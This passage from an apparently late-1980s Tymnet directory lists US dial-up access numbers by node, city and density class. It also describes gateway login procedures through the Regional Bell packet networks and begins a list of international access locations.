06376 # KISSIMMEE FLORIDA LOW 407/933-8425
06407 # CEDAR RAPIDS IOWA LOW 319/363-7514
06412 # ATHENS GEORGIA LOW 404/548-7006
06421 # LAWRENCE MASSACHUSETTS LOW 508/683-2680
06457 # ANAHEIM/NEWPRT BE CALIFORNIA HIGH 714/852-8141
06462 PERINTON/PITTSFRD NEW YORK HIGH 716/385-5817
06462 PITTSFORD NEW YORK HIGH 716/385-5817
06462 ROCHESTER/PITTSFO NEW YORK HIGH 716/385-5817
06464 # PERINTON/PITTSFOR NEW YORK HIGH 716/385-5710
06464 # PITTSFORD NEW YORK HIGH 716/385-5710
06464 # ROCHESTER/PITTSFO NEW YORK HIGH 716/385-5710
06472 PISCATAWAY NEW JERSEY HIGH 201/562-9700
06501 OKLAHOMA CITY OKLAHOMA HIGH 405/495-8201
06506 + OKLAHOMA CITY OKLAHOMA HIGH 405/787-0684
06507 # OKLAHOMA CITY OKLAHOMA HIGH 405/495-9201
06521 # WHITE PLAINS NEW YORK HIGH 914/761-9590
06522 PAWTUCKET/PROVDEN RHODE ISLAND HIGH 401/273-0200
06522 PROVIDENCE RHODE ISLAND HIGH 401/273-0200
06522 WARWICK/PROVIDENC RHODE ISLAND HIGH 401/273-0200
06525 # NEW ORLEANS LOUISIANA HIGH 504/525-2014
06532 NEW ORLEANS LOUISIANA HIGH 504/522-1370
06544 # PISCATAWAY NEW JERSEY HIGH 201/562-8550
06546 # GARY INDIANA LOW 219/885-0002
06546 # HAMMOND/GARY INDIANA LOW 219/885-0002
06546 # HIGHLAND/GARY INDIANA LOW 219/885-0002
06551 # BELLINGHAM WASHINGTON LOW 206/671-5990
06563 OLYMPIA WASHINGTON LOW 206/943-9050
06564 EVERETT WASHINGTON LOW 206/258-1018
06570 + PITTSBURGH PENNSYLVANIA LOW 412/642-2271
06574 MIAMI FLORIDA HIGH 305/599-2900
06575 # INGLEWOOD CALIFORNIA HIGH 213/587-7514
06575 # LOS ANGELES/VERNO CALIFORNIA HIGH 213/587-7514
06575 # VERNON CALIFORNIA HIGH 213/587-7514
06605 # LOS ALTOS/SAN JOS CALIFORNIA HIGH 408/432-8618
06605 # SAN JOSE CALIFORNIA HIGH 408/432-8618
06605 # SANTA CLARA/SAN J CALIFORNIA HIGH 408/432-8618
06605 # SUNNYVALE/SAN JOS CALIFORNIA HIGH 408/432-8618
06624 # NEW HAVEN/NO. HAV CONNECTICUT MED 203/787-4674
06626 LEXINGTON KENTUCKY MED 606/266-0019
06645 # CHAPEL HILL/DURHA NORTH CAROLINA MED 919/549-9025
06645 # DURHAM NORTH CAROLINA MED 919/549-9025
06651 AURORA/DENVER COLORADO HIGH 303/830-8530
06651 BOULDER/DENVER COLORADO HIGH 303/830-8530
06651 DENVER COLORADO HIGH 303/830-8530
06655 # AURORA/DENVER COLORADO HIGH 303/832-3447
06655 # BOULDER/DENVER COLORADO HIGH 303/832-3447
06655 # DENVER COLORADO HIGH 303/832-3447
06660 ELMIRA NEW YORK LOW 607/737-9065
06674 HOUSTON TEXAS HIGH 713/556-6700
06675 # STATE COLLEGE PENNSYLVANIA LOW 814/234-3853
06704 HOUSTON TEXAS HIGH 713/556-6700
06715 MIDLOTHIAN/RICHMO VIRGINIA MED 804/330-2465
06715 RICHMOND VIRGINIA MED 804/330-2465
06754 # KITCHENER ONTARIO CANL 519/742-7613
06762 # MARQUETTE MICHIGAN LOW 906/228-3780
06770 # FT. LAUDERDALE FLORIDA MED 305/467-1870 06770 # HOLLYWD/FT LDRDL FLORIDA MED 305/467-1870
06770 # PMPN BCH/FT LDRDL FLORIDA MED 305/467-1870
06771 # FT. SMITH ARKANSAS LOW 501/782-2486
06774 # TOPEKA KANSAS LOW 913/234-3070
07001 BOSTON MASSACHUSETTS HIGH 617/439-3400
07001 CAMBRIDGE/BOSTON MASSACHUSETTS HIGH 617/439-3400
07005 DETROIT MICHIGAN HIGH 313/964-1225
07024 # LONGVIEW TEXAS LOW 214/236-7475
07026 # CHARLOTTE NORTH CAROLINA HIGH 704/374-0803
07031 # ALBANY GEORGIA LOW 912/888-9282
07042 # NASHUA NEW HAMPSHIRE MED 603/882-0435
07042 # SALEM/NASHUA NEW HAMPSHIRE MED 603/882-0435
07043 # SARASOTA FLORIDA LOW 813/952-9000
07054 # NEW YORK NEW YORK HIGH 212/809-9660
07061 # NEW YORK NEW YORK HIGH 212/809-9660
07062 # NEW YORK NEW YORK HIGH 212/809-9660
07075 CINCINNATI OHIO HIGH 513/530-9019
07107 BARRE/MONTPELIER VERMONT LOW 802/229-4508
07107 MONTPELIER VERMONT LOW 802/229-4508
07117 # FREMONT CALIFORNIA MED 415/490-7366
07121 # OMAHA NEBRASKA MED 402/393-1305
07124 # BISMARK NORTH DAKOTA LOW 701/255-0869
07126 # ROLLA MISSOURI LOW 314/364-2084
07140 + CINCINNATI OHIO HIGH 513/489-1032
07144 # PORTLAND OREGON HIGH503/222-2151
07145 # PORTLAND OREGON HIGH 503/222-2151
07147 PORTLAND OREGON HIGH 503/222-0900
07150 # BOCA RATON/DELRAY FLORIDA LOW 407/272-7900
07150 # DELRAY FLORIDA LOW 407/272-7900
07154 # GREAT FALLS MONTANA LOW 406/727-9510
07176 SAN JUAN PUERTO RICO INTL 809/725-1882
07176 SAN JUAN PUERTO RICO INTL 809/725-4343
07200 # PUEBLO COLORADO LOW 719/543-9712
07205 LOS ALTOS/SAN JOS CALIFORNIA HIGH 408/432-3430
07205 SAN JOSE CALIFORNIA HIGH 408/432-3430
07205 SANTA CLARA/SAN J CALIFORNIA HIGH 408/432-3430
07205 SUNNYVALE/SAN JOS CALIFORNIA HIGH 408/432-3430
07210 FALL RIVER/SOMERS MASSACHUSETTS LOW 508/676-3087
07210 SOMERSET MASSACHUSETTS LOW 508/676-3087
07214 MIDDLETOWN RHODE ISLAND LOW 401/849-1660
07214 NEWPORT/MIDDLETWN RHODE ISLAND LOW 401/849-1660
07216 # MT. PENN PENNSYLVANIA LOW 215/779-9580
07216 # READING/MT. PENN PENNSYLVANIA LOW 215/779-9580
07217 # GREENSBURG PENNSYLVANIA LOW 412/836-4470
07217 # LATROBE/GREENSBUR PENNSYLVANIA LOW 412/836-4470
07220 BRIDGEPORT CONNECTICUT MED 203/579-1479
07220 STRATFORD/BRIDGEP CONNECTICUT MED 203/579-1479
07223 # DAYTON OHIO MED 513/898-0696
07226 OGDEN UTAH LOW 801/393-5280
07236 # WHITE PLAINS NEW YORK HIGH 914/761-9590
07241 # GREENVILLE NORTH CAROLINA LOW 919/758-0102
07242 # HIGH POINT NORTH CAROLINA LOW 919/883-6121
07243 # PARKERSBURG WEST VIRGINIA LOW 304/485-9470
07264 MIAMI FLORIDA HIGH 305/592-2357
07301 # ROME GEORGIA LOW 404/234-0102
07303 # DANVILLE ILLINOIS LOW 217/442-1452
07305 # KENOSHA WISCONSIN LOW 414/553-9044
07305 # RACINE/KENOSHA WISCONSIN LOW 414/553-9044
07306 # DAVENPORT/RKISLND IOWA MED 309/788-3713
07306 # ROCK ISLAND ILLINOIS MED 309/788-3713
07312 # AGANA HEIGHTS GUAM INTL 671/477-2222
07315 # ABERDEEN MARYLAND LOW 301/273-7100
07316 # WILMINGTON NORTH CAROLINA LOW 919/762-1865
07322 # GREELEY COLORADO LOW 303/352-0960
07331 LEVITTOWN PENNSYLVANIA LOW 215/943-3700
07332 PITTSFIELD MASSACHUSETTS LOW 413/499-0971
07333 # WARREN OHIO LOW 216/392-2542
07336 # ARDMORE OKLAHOMA LOW 405/226-1260
07340 GRAND FORKS NORTH DAKOTA LOW 701/746-0344
07364 # CORNING NEW YORK LOW 607/962-4481
07371 # HUNTINGTON WEST VIRGINIA LOW 304/523-8432
07372 # PETERSBURG VIRGINIA LOW 804/861-1788
07374 # TAUNTON MASSACHUSETTS LOW 508/824-6692
07375 # HANOVER NEW HAMPSHIRE LOW 603/643-4011
07377 # SAN FRANCISCO CALIFORNIA HIGH 415/543-0691
07404 # LONG BEACH CALIFORNIA MED 213/436-6033
07404 # NORWALK/LONG BEAC CALIFORNIA MED 213/436-6033
07404 # SAN PEDRO/LONG BE CALIFORNIA MED 213/436-6033
07413 + NEWARK NEW JERSEY LOW 201/824-4201
07417 SAN FRANCISCO CALIFORNIA HIGH 415/495-7220
07420 # SAN FRANCISCO CALIFORNIA HIGH 415/543-0691
07432 LYNDHURST/UNION C NEW JERSEY HIGH 201/864-8468
07432 UNION CITY NEW JERSEY HIGH 201/864-8468
07434 DAVIS CALIFORNIA LOW 916/758-3551
07434 WOODLAND/DAVIS CALIFORNIA LOW 916/758-3551
07447 # BUTTE MONTANA LOW 406/494-6682
07450 DALLAS TEXAS HIGH 214/637-3012
07454 # TERRE HAUTE INDIANA LOW 812/232-0112
07455 LAFAYETTE INDIANA LOW 317/423-4616
07456 # DUBUQUE IOWA LOW 319/582-3599
07457 # MINOT NORTH DAKOTA LOW 701/839-4210
07460 # BELOIT WISCONSIN LOW 608/362-4655
07460 # JANESVILLE/BELOIT WISCONSIN LOW 608/362-4655
07463 # HOT SPRINGS ARKANSAS LOW 501/623-3576
07464 JONESBORO ARKANSAS LOW 501/935-7957
07465 # CADILLAC MICHIGAN LOW 616/775-9242
07466 # MUSKEGON MICHIGAN LOW 616/739-3453
07467 # PORT HURON MICHIGAN LOW 313/982-0301
07471 # BOWLING GREEN KENTUCKY LOW 502/781-5711
07472 # MANSFIELD OHIO LOW 419/529-3303
07510 ST THOMAS US VIRGIN ISL INTL 809/774-7099
07510 ST THOMAS US VIRGIN ISL INTL 809/776-7084
07511 # DOVER DELAWARE LOW 302/678-9545
07522 # SAN ANGELO TEXAS LOW 915/658-4590
07525 BOSTON MASSACHUSETTS HIGH 617/439-3400
07525 CAMBRIDGE/BOSTON MASSACHUSETTS HIGH 617/439-3400
07533 INGLEWOOD/VERNON CALIFORNIA HIGH 213/588-8128
07533 LOS ANGELES/VERNO CALIFORNIA HIGH 213/588-8128
07533 VERNON CALIFORNIA HIGH 213/588-8128
07540 # CALGARY ALBERTA CANH 403/232-6653
07542 + SACRAMENTO CALIFORNIA LOW 916/442-0992
07571 # SALISBURY MARYLAND LOW 301/860-0480
07607 # GASTONIA NORTH CAROLINA LOW 704/867-2203
07610 LYNN MASSACHUSETTS LOW 617/593-4051
07625 # LOWELL MASSACHUSETTS LOW 508/452-5112
07631 # AUBURN WASHINGTON LOW 206/735-3975
07631 # ENUMCLAW/AUBURN WASHINGTON LOW 206/735-3975
07636 # SANTA FE NEW MEXICO LOW 505/471-0606
07646 # MONROE LOUISIANA LOW 318/388-8810
07650 # KOKOMO INDIANA LOW 317/453-7818
07651 # APPLETON WISCONSIN LOW 414/730-8029
07652 CORONA CALIFORNIA LOW 714/737-5510
07653 # POWAY CALIFORNIA LOW 619/679-0200
07655 # NORRISTOWN PENNSYLVANIA WATS 800/###-####
07656 # NORRISTOWN PENNSYLVANIA WATS 800/###-####
07664 # MADISON WISCONSIN LOW 608/221-0891
07675 DUNDAS ONTARIO CANH 416/628-5908
07675 HAMILTON/DUNDAS ONTARIO CANH 416/628-5908
07676 NEWPORT NEWS VIRGINIA MED 804/596-0898
07677 # FITCHBURG/LEOMINS MASSACHUSETTS LOW 508/537-6451
07677 # LEOMINSTER MASSACHUSETTS LOW 508/537-6451
07706 # MUNCIE INDIANA LOW 317/284-7821
07712 # VERO BEACH FLORIDA LOW 407/569-8207
07714 # MERIDIAN MISSISSIPPI LOW 601/482-4335
07717 # BAYTOWN TEXAS LOW 713/420-3389
07721 # FREEPORT ILLINOIS LOW 815/232-7111
07723 # DOTHAN ALABAMA LOW 205/794-7954
07725 # PANAMA CITY FLORIDA LOW 904/769-0709
07726 # LEAVENWORTH KANSAS LOW 913/651-8094
07730 # SALINA KANSAS LOW 913/825-4845
07731 CICERO/MAYWOOD ILLINOIS LOW 708/345-9100
07731 FOREST PARK/MAYWO ILLINOIS LOW 708/345-9100
07731 MAYWOOD ILLINOIS LOW 708/345-9100
07733 # MARION INDIANA LOW 317/662-1928
07735 ATTLEBORO MASSACHUSETTS LOW 508/226-6441
07736 WOONSOCKET RHODE ISLAND LOW 401/765-5994
07737 # LYNCHBURG VIRGINIA LOW 804/846-0213
07743 HOLYOKE/SPRINGFIE MASSACHUSETTS MED 413/787-0048
07743 SPRINGFIELD MASSACHUSETTS MED 413/787-0048
07747 WILLIAMSPORT PENNSYLVANIA LOW 717/323-0386
07776 MIDLAND TEXAS LOW 915/561-8401
07776 ODESSA/MIDLAND TEXAS LOW 915/561-8401
10021 # HOUSTON TEXAS HIGH 713/496-1332
10027 # KANNAPOLIS NORTH CAROLINA LOW 704/932-4131
10031 # BEDFORD MASSACHUSETTS LOW 617/271-0420
10031 # WOBURN/BEDFORD MASSACHUSETTS LOW 617/271-0420
10034 BALTIMORE MARYLAND HIGH 301/659-7460
10036 # MERCED CALIFORNIA LOW 209/383-7593
10044 # KNOXVILLE TENNESSEE MED 615/693-0498
10061 BUFFALO NEW YORK MED 716/893-1306
10071 YORK PENNSYLVANIA LOW 717/848-9850
10072 # FAIRFIELD CALIFORNIA LOW 707/426-5900
10100 # CORVALLIS OREGON LOW 503/757-6341
10103 ANN ARBOR MICHIGAN MED 313/973-0166
10105 # CAMDEN/PENNSAUKEN NEW JERSEY MED 609/665-5902
10105 # CHERRY HILL/PENNS NEW JERSEY MED 609/665-5902
10105 # PENNSAUKEN NEW JERSEY MED 609/665-5902
10113 # WESTPORT CONNECTICUT MED 203/454-2129
10115 # MIDLOTHIAN/RICHMO VIRGINIA MED 804/330-2673
10115 # RICHMOND VIRGINIA MED 804/330-2673
10122 OTTAWA ONTARIO CANH 613/563-2910
10122 OTTAWA ONTARIO CANH 613/563-2970
10130 # SACRAMENTO CALIFORNIA HIGH 916/447-7434
10133 ATLANTA/DORAVILLE GEORGIA HIGH 404/451-2208
10133 DORAVILLE GEORGIA HIGH 404/451-2208
10133 MARIETTA/DORAVILL GEORGIA HIGH 404/451-2208
10133 NORCROSS/DORAVILL GEORGIA HIGH 404/451-2208
10134 ATLANTA/DORAVILLE GEORGIA HIGH 404/451-2208
10134 DORAVILLE GEORGIA HIGH 404/451-2208
10134 MARIETTA/DORAVILL GEORGIA HIGH 404/451-2208
10134 NORCROSS/DORAVILL GEORGIA HIGH 404/451-2208
10153 + SOUTH BRUNSWICK NEW JERSEY HIGH 609/452-8388
10170 JOHNSTOWN PENNSYLVANIA LOW 814/539-5059
10171 JAMESTOWN NEW YORK LOW 716/488-0794
10172 # SOMERS CONNECTICUT LOW 203/763-3521
10203 # ATLANTA/DORAVILLE GEORGIA HIGH 404/451-3362
10203 # DORAVILLE GEORGIA HIGH 404/451-3362
10203 # MARIETTA/DORAVILL GEORGIA HIGH 404/451-3362
10203 # NORCROSS/DORAVILL GEORGIA HIGH 404/451-3362
10204 # ATLANTA/DORAVILLE GEORGIA HIGH 404/451-3362
10204 # ATLANTA/DORAVILLE GEORGIA HIGH 404/451-3362
10204 # MARIETTA/DORAVILL GEORGIA HIGH 404/451-3362
10204 # NORCROSS/DORAVILL GEORGIA MED 404/451-3362
10212 HAMILTON OHIO LOW 513/874-1744
10213 # OCALA FLORIDA LOW 904/732-3707
10221 # NAPLES FLORIDA LOW 813/434-8080
10233 # CLEVELAND OHIO HIGH 216/861-6709
10244 # ALHAMBRA CALIFORNIA MED 818/308-1994
10244 # ARCADIA/ALHAMBRA CALIFORNIA MED 818/308-1994
10244 # EL MONTE/ALHAMBRA CALIFORNIA MED 818/308-1994
10244 # PASADENA/ALHAMBRA CALIFORNIA MED 818/308-1994
10247 # BRADLEY ILLINOIS LOW 815/935-2352
10247 # KANKAKEE/BRADLEY ILLINOIS LOW 815/935-2352
10254 ATLANTA/DORAVILLE GEORGIA HIGH 404/451-1546
10254 DORAVILLE GEORGIA HIGH 404/451-1546
10254 MARIETTA/DORAVILL GEORGIA HIGH 404/451-1546
10254 NORCROSS/DORAVILL GEORGIA HIGH 404/451-1546
10255 # LAREDO TEXAS LOW 512/727-8308
10256 # HAMPTON VIRGINIA MED 804/727-0572
10261 # SHEBOYGAN WISCONSIN LOW 414/457-6128
10301 # ABILENE TEXAS LOW 915/676-0091
10305 # GADSDEN ALABAMA LOW 205/543-3550
10307 # ANN ARBOR MICHIGAN MED 313/973-7935
10320 # IOWA CITY IOWA LOW 319/354-3633
10325 # INGLEWOOD/VERNON CALIFORNIA HIGH 213/587-7514
10325 # LOS ANGELES/VRN CALIFORNIA HIGH 213/587-7514
10325 # VERNON CALIFORNIA HIGH 213/587-7514
10337 LOUISVILLE KENTUCKY MED 502/499-7110
10346 # NORFOLK VIRGINIA MED 804/857-0148
10346 # PORTSMOUTH/NRFLK VIRGINIA MED 804/857-0148
10346 # VA BCH/NRFLK VIRGINIA MED 804/857-0148
10363 # EL SEGUNDO CALIFORNIA MED 213/643-4228
10363 # MAR VISTA/EL SGND CALIFORNIA MED 213/643-4228
10363 # MARINADELREY/EL S CALIFORNIA MED 213/643-4228
10363 # SANTA MONICA/EL S CALIFORNIA MED 213/643-4228
10432 LANSING ILLINOIS LOW 708/474-1422
10436 # CONCORD/WLNT CRK CALIFORNIA MED 415/935-1507
10436 # PACHECO/WALNT CRK CALIFORNIA MED 415/935-1507
10436 # PLEASNTHILL/WALNT CALIFORNIA MED 415/935-1507
10436 # WALNUT CREEK CALIFORNIA MED 415/935-1507
10464 # QUEBEC CITY QUEBEC CANH 418/647-1116
10470 # ARLINGTON/FORT W TEXAS MED 817/332-9397
10470 # FORT WORTH TEXAS MED 817/332-9397
10471 JOLIET ILLINOIS LOW 815/727-2169
10472 WINDSOR NEW YORK LOW 914/561-9103
10474 # MONTEREY CALIFORNIA LOW 408/375-2644
10506 # JOHNSON CITY TENNESSEE LOW 615/928-9544
10510 # LAFAYETTE LOUISIANA LOW 318/234-8255
10515 # BOSTON MASSACHUSETTS HIGH 617/439-3531
10515 # CAMBRIDGE/BOSTON MASSACHUSETTS HIGH 617/439-3531
10516 # CHARLOTTESVILLE VIRGINIA LOW 804/977-5661
10520 # BOSTON MASSACHUSETTS HIGH 617/439-3531
10520 # CAMBRIDGE/BOSTON MASSACHUSETTS HIGH 617/439-3531
10521 # BOSTON MASSACHUSETTS HIGH 617/439-3531
10521 # CAMBRIDGE/BOSTON MASSACHUSETTS HIGH 617/439-3531
10542 # ALLEN/McKINNEY TEXAS LOW 214/542-2641
10542 # McKINNEY TEXAS LOW 214/542-2641
10543 AKRON OHIO MED 216/376-6227
10546 # AKRON OHIO MED 216/376-8330
10560 # ROCKVILLE MARYLAND LOW 301/869-2700
10561 SAN JOSE CALIFORNIA WATS 800/###-####
10561 SANTA CLARA/SAN CALIFORNIA WATS 800/###-####
10567 # CHAPEL HILL/DURHA NORTH CAROLINA MED 919/549-9025
10567 # DURHAM NORTH CAROLINA MED 919/549-9025
10570 BOZEMAN MONTANA LOW 406/585-9719
10573 MAUI HAWAII LOW 808/242-8411
10574 HILO HAWAII MED 808/935-5717
10601 # AUGUSTA MAINE LOW 207/622-3083
10602 # CAPE GIRARDEAU MISSOURI LOW 314/335-1518
10603 # ELYRIA OHIO LOW 216/324-7156
10604 # FLORENCE SOUTH CAROLINA LOW 803/664-0550
10605 # KINGSTON NEW YORK LOW 914/336-2790
10612 MONTREAL/ST. LAUR QUEBEC CANH 514/747-2996
10612 MONTREAL/ST. LAUR QUEBEC CANH 514/747-1370
10612 VILLE ST. LAURENT QUEBEC CANH 514/747-2996
10612 VILLE ST. LAURENT QUEBEC CANH 514/747-1370
10615 SECANE PENNSYLVANIA LOW 215/543-3045
10617 # E. ST. LOUIS ILLINOIS LOW 618/874-5702
10621 PRINCETON/SO. BRN NEW JERSEY HIGH 609/452-1018
10621 SOUTH BRUNSWICK NEW JERSEY HIGH 609/452-1018
10622 # SOUTH BRUNSWICK NEW JERSEY HIGH 609/452-9529
10622 # SOUTH BRUNSWICK NEW JERSEY HIGH 609/452-9529
10631 HONOLULU HAWAII MED 808/545-7610
10632 # HONOLULU HAWAII MED 808/528-5300
10673 # SPRINGFIELD MISSOURI LOW 417/881-6225
11013 # SPRINGFIELD/EUGEN OREGON LOW 503/343-0044
11014 # WACO TEXAS LOW 817/776-0880
11015 # KILLEEN TEXAS LOW 817/526-8118
11016 # SPOKANE WASHINGTON LOW 509/747-3011
11026 # SLIDELL LOUISIANA LOW 504/646-2900
11035 # CLEARWATER FLORIDA MED 813/441-1621
11035 # ST. PETERSBRG/CLR FLORIDA MED 813/441-1621
11052 # EUREKA CALIFORNIA LOW 707/445-3021
11052 # EUREKA CALIFORNIA LOW 707/445-9271
11053 PROVO UTAH LOW 801/373-2192
11063 # CUMBERLAND MARYLAND LOW 301/777-9320
11067 # AUBURN MAINE LOW 207/795-6013
11067 # LEWISTON/AUBURN MAINE LOW 207/795-6013
11120 # EL PASO TEXAS MED 915/533-1453
11121 # EL PASO TEXAS MED 915/533-1453
11123 # BUFFALO NEW YORK MED 716/893-1014
11130 # HOUSTON TEXAS HIGH 713/496-1332
11144 + GRAND RAPIDS MICHIGAN MED 616/458-9252
11150 # CHICAGO ILLINOIS WATS 800/###-####
11151 # CHICAGO ILLINOIS WATS 800/###-####
11152 # CHICAGO ILLINOIS WATS 800/###-####
11161 # WINSTON-SALEM NORTH CAROLINA MED 919/765-1221
11162 # CHARLESTON SOUTH CAROLINA LOW 803/553-0860
11207 # O’FALLON ILLINOIS LOW 618/632-3993
11231 # LANCASTER PENNSYLVANIA LOW 717/569-1081
11236 # LANSING MICHIGAN MED 517/484-5344
11237 # COLUMBIA SOUTH CAROLINA MED 803/252-7375
11240 # GREENVILLE SOUTH CAROLINA MED 803/233-5621
11241 # MOBILE ALABAMA MED 205/460-2515
11242 # LAKE ZURICH/PALAT ILLINOIS LOW 708/991-7171
11242 # PALATINE ILLINOIS LOW 708/991-7171
11251 # DENTON TEXAS LOW 817/565-0552
11252 # VANCOUVER WASHINGTON LOW 206/574-0427
11257 # LITTLE ROCK ARKANSAS MED 501/666-6886
11266 # FORT COLLINS COLORADO LOW 303/224-9819
11267 # AMARILLO TEXAS LOW 806/355-7088
11270 # SAN RAFAEL CALIFORNIA LOW 415/453-2087
11271 # CATHEDRAL CITY CALIFORNIA LOW 619/324-0920
11271 # PALM SPRNGS/CATH CALIFORNIA LOW 619/324-0920
11272 # MOORPARK CALIFORNIA LOW 805/523-0203
11273 # SAN CLEMENTE CALIFORNIA LOW 714/240-9424
11274 # MISHAWAKA/SOUTH B INDIANA MED 219/234-6410
11274 # SOUTH BEND INDIANA MED 219/234-6410
11275 # BRIDGEPORT CONNECTICUT MED 203/332-7256
11276 # SYRACUSE NEW YORK MED 315/433-1593
11300 # TOLEDO OHIO LOW 419/255-7705
11301 ALTOONA PENNSYLVANIA MED 814/946-8639
11301 # HARRISBURG/LEMOYN PENNSYLVANIA MED 717/975-9881
11301 # LEMOYNE PENNSYLVANIA MED 717/975-9881
11304 # NEWARK/WILMINGTON DELAWARE MED 302/652-2036
11304 # WILMINGTON DELAWARE MED 302/652-2036
11305 # LYNDHURST/UNION C NEW JERSEY HIGH 201/864-0995
11305 # UNION CITY NEW JERSEY HIGH 201/864-0995
11306 # HOLYOKE/SPRINGFIE MASSACHUSETTS MED 413/785-1762
11306 # SPRINGFIELD MASSACHUSETTS MED 413/785-1762
11307 # ROCKFORD ILLINOIS MED 815/633-2080
11313 LITTLE ROCK ARKANSAS MED 501/666-6024
11315 # OAKRIDGE TENNESSEE LOW 615/482-1466
11321 # NORTHPORT ALABAMA LOW 205/758-1116
11321 # TUSCALOOSA/NORTHP ALABAMA LOW 205/758-1116
11323 # OWENSBORO KENTUCKY LOW 502/685-0959
11356 # ASHEVILLE NORTH CAROLINA LOW 704/253-8945
11360 # BOULDER CITY NEVADA MED 702/294-0602
11360 # LAS VEGAS/BLDR CI NEVADA MED 702/294-0602
11362 # STAMFORD CONNECTICUT HIGH 203/327-2974
11371 SANTA BARBARA CALIFORNIA MED 805/564-2354
11372 # SANTA BARBARA CALIFORNIA MED 805/965-1612
11402 # MODESTO CALIFORNIA LOW 209/527-0150
11405 # MARLBOROUGH MASSACHUSETTS LOW 508/481-0026
11406 # AUGUSTA/MARTINEZ GEORGIA LOW 404/855-0442
11406 # MARTINEZ GEORGIA LOW 404/855-0442
11417 # PHILADELPHIA PENNSYLVANIA HIGH 215/592-8750
11422 RANDOLPH MASSACHUSETTS LOW 617/986-0500
11451 # BATTLE CREEK MICHIGAN LOW 616/964-9303
11452 # HARRISONBURG VIRGINIA LOW 703/433-6333
11453 # GROTON MASSACHUSETTS LOW 508/448-9361
11663 # ANNAPOLIS MARYLAND LOW 301-224-0520
11671 # ROCHESTER MINNESOTA LOW 507/282-0830
11702 # GEORGETOWN DELAWARE LOW 302/856-1788
11741 # DULUTH MINNESOTA LOW 218/722-0655
11743 # NORTHFIELD ILLINOIS LOW 708/501-4536
11752 # WEST BEND WISCONSIN LOW 414/334-1755
11754 # VICTORIA TEXAS LOW 512/576-9200

TYMNET ACCESS SORTED BY STATE WITHIN REGIONAL BELL OPERATING COMPANY

TYMNET has gateways into many of the Regional Bell Operating Company packet networks. For specifics on how to access these networks, please refer to the information listed at the end of each company section.

07771 RED BANK NEW JERSEY 300/2400 201/758-8000 DN
07771 TOMS RIVER NEW JERSEY 300/2400 201/286-3800 DN
PDN

DN BELL ATLANTIC – NETWORK NAME IS PUBLIC DATA NETWORK (PDN)

(CONNECT MESSAGE)
...<CR> (SYNCHRONIZES DATA SPEEDS)

WELCOME TO THE BPA/DST PDN

*.T <CR> (TYMNET ADDRESS)

131069 (ADDRESS CONFIRMATION – TYMNET DNIC)
COM (CONFIRMATION OF CALL SET-UP)

-GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST # WITHIN DASHES)
—————————————————-
BELL SOUTH

LSK BELLSOUTH – NETWORK NAME IS PULSELINK

(CONNECT MESSAGE)

... <CR> (SYNCHRONIZES DATA SPEEDS)
(DOES NOT ECHO TO THE TERMINAL)
CONNECTED
PULSELINK

13106 (TYMNET ADDRESS)
(DOES NOT ECHO TO THE TERMINAL)

PULSELINK: CALL CONNECTED TO 1 3106

-GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST # WITHIN DASHES)
—————————————————-
PACIFIC BELL

PS PACIFIC BELL – NETWORK NAME IS PUBLIC PACKET SWITCHING (PPS)

(CONNECT MESSAGE)

...<CR> (SYNCHRONIZES DATA SPEEDS)
(DOES NOT ECHO TO THE TERMINAL)

ONLINE 1200
WELCOME TO PPS: 415-XXX-XXXX
131069 (TYMNET ADDRESS)
(DOES NOT ECHO UNTIL TYMNET RESPONDS)

-GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST # WITHIN DASHES)
———————————————————

SOUTHWESTERN BELL
RLK – SOUTHWESTERN BELL TELEPHONE- NETWORK NAME IS MICROLINK II(R)

(CONNECT MESSAGE)
(PLEASE TYPE YOUR TERMINAL IDENTIFIER)

A (YOUR TERMINAL IDENTIFIER)

WELCOME TO MICROLINK II
-XXXX:01-030-
PLEASE LOG IN:
.T <CR> (USERNAME TO ACCESS TYMNET)

HOST: CALL CONNECTED

-GWY 0XXXX- TYMNET: PLEASE LOG IN:
——————————————————–
SOUTHERN NEW ENGLAND

ONNNET – SOUTHERN NEW ENGLAND TELEPHONE – NETWORK NAME IS CONNNET

(CONNECT MESSAGE)

HH<CR> (SYNCHRONIZES DATA SPEEDS)
(DOES NOT ECHO TO THE TERMINAL)
CONNNET

.T<CR> (MUST BE CAPITAL LETTERS)

26-SEP-88 18:33 (DATA)
031069 (ADDRESS CONFIRMATION)
COM (CONFIRMATION OF CALL SET-UP)

-GWY OXXXX-TYMNET: PLEASE LOG IN:

——————————————————

BT TYMNET GLOBAL DATA NETWORK (GDN) SERVICES

INTERNATIONAL ACCESS LOCATIONS

The TYMNET Public Network is accessible from most countries throughout the world. In many cities within these countries TYMNET may be accessed with a local phone call. These countries are listed below for your convenience.
TYMNET can also be accessed from most other countries via TYMUSA or Telex. For more complete information about access to TYMNET from international locations, or about access to international locations from TYMNET, consult the Information System or your local BT Tymnet representative or call Customer Information Help Desk at 800/336-0149 or 703/442-0145.

INTERNATIONAL DIRECT DIAL-UP ACCESS

BT Tymnet, in its continuing effort to provide convenient data communications solutions for you, now offers direct dial-up access from international locations.
Users located in the countries listed can access TYMNET, directly, using terminals and/or PCs operating asynchronously.
International Service Requirements

Speed (bps): Modem Type:
300 CCITT V.21
300B Bell 103/113 compatible
1200 CCITT V.22
1200B Bell 212A compatible
2400 CCITT V.22 bis compatible
9600 CCITT V.32 compliant

Notes:
– Trispeed denotes 300B, 1200B, or 2400 capability
– Services fully compliant with BT Tymnet certified modems
– V.42 compatible/MNP Level 2 – 4
– Density classifications (CanH, CanL, 1, 2, 3, 4, 5, E1,
E2, Pacific, *) signify a rate structure different from standard domestic rates.
Please consult the Information System or your local BT Tymnet representative for details.

Access procedures for direct access are identical to domestic access procedures. Please consult the pamphlet “How to Use TYMNET” (Publications #C-001) for more details.
————————————————————

GLOBAL NETWORK SERVICES “GNS” COUNTRIES
Countries With Direct TYMNET Access

Country, Province Access
City Density Number Comments
————————————————————
AUSTRALIA
————————————————————
Melbourne Pacific (3)416-2146 300/1200/2400/mnp
Sydney Pacific (2)290-3400 300/1200/2400/mnp
For BT Tymnet’s Australian Support Center, call: 008-032064
————————————————————
BELGIUM
————————————————————
Brussels E1 (2)640-0215 300
E1 (2)647-1150 1200/2400
Mons E1 (65)36-0051 1200/2400

Note: When dialing inter-country to Belgium, all phone numbers are preceded by dialing (32).
————————————————————
DENMARK
————————————————————
Copenhagen E2 31-18-63-33 300/1200/2400/mnp

Note: When dialing inter-country to Copenhagen, the phone number is preceded by dialing (45).

————————————————————
FRANCE
————————————————————
